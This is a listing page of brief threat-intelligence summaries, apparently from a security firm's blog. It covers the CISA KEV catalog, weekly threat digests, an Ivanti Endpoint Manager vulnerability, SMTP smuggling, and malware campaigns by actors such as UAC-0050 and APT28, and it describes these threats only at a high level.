CISA Known Exploited Vulnerability Catalog December 2023
For a detailed CISA’s KEV Catalog, download the pdf file here Summary The Known Exploited Vulnerability (KEV) catalog, maintained by CISA, is the authoritative source of vulnerabilities that have been exploited in the wild. It is recommended that all organizations review and monitor the KEV catalog, …
Attacks, Vulnerabilities and Actors 1 January to 7 January 2024
For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of twelve executed attacks, two instances of adversary activity, and three exploited vulnerability, highlighting the …
Ivanti Addresses Critical Vulnerability in Endpoint Manager
Summary: Ivanti addressed a critical vulnerability (CVE-2023-39336) in its Endpoint Management software, ensuring secure usage for its 40,000 worldwide customers. The flaw, resolved in version 2022 Service Update 5, posed a risk of pre-authenticated sql injection and possibly Remote Code Injection in case of core …
Decoding UAC-0050’s Cyber Espionage Playbook
Summary: UAC-0050, a threat actor focused on Ukraine, is using new tactics to spread the Remcos RAT. In their latest move, UAC-0050 shows advanced adaptability by cleverly avoiding detection through a hidden data transfer method and outsmarting EDR systems. Threat Level – Amber | Attack …
Surging JavaScript Threats Steal Your Secrets
Summary: The threat actors utilize malicious JavaScript samples, taking advantage of popular survey sites, low-quality hosting, and web chat APIs to steal sensitive information. They create chatbots registered under notable figures, like an Australian footballer, in specific campaigns. Additionally, these actors employ various tactics, including …
SMTP Smuggling Enabling Spoofed Emails to Evade Authentication Protocols
Summary: A new email spoofing technique called “SMTP Smuggling” lets attackers send emails from fake addresses, bypassing security checks. This trick works by abusing how different servers handle line endings in email messages. The attack could affect millions of email users, so updating your software …
Malware Leveraging Google OAuth for Persistent Account Access
Summary: Information-stealing malware is actively exploiting an undisclosed Google OAuth endpoint called MultiLogin. This technique was initially disclosed by a threat actor named PRISMA on their Telegram channel and has subsequently been integrated into various malware-as-a-service (MaaS) stealer families. Threat Level – Amber | Attack …
Attacks, Vulnerabilities and Actors 25 December to 31 December 2023
For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of eight executed attacks, four instances of adversary activity, and five exploited vulnerability, highlighting the …
Nim Backdoor Masquerades as Nepal Government Security
Summary: Attackers employed malicious Microsoft Word documents disguised as official communications from the Nepali government. These documents aimed to trick victims into downloading and executing a backdoor program written in the Nim programming language. As Nim is an uncommon language, it poses challenges for analysis …
Unveiling Novel Malware Waves by APT28
Summary: A recent phishing campaign attributed to the Russia-linked APT28 group has been identified targeting Ukrainian government entities and Polish organizations with email messages urging recipients to click on a link to view a document. The goal is to deploy previously undocumented malware, including OCEANMAP, …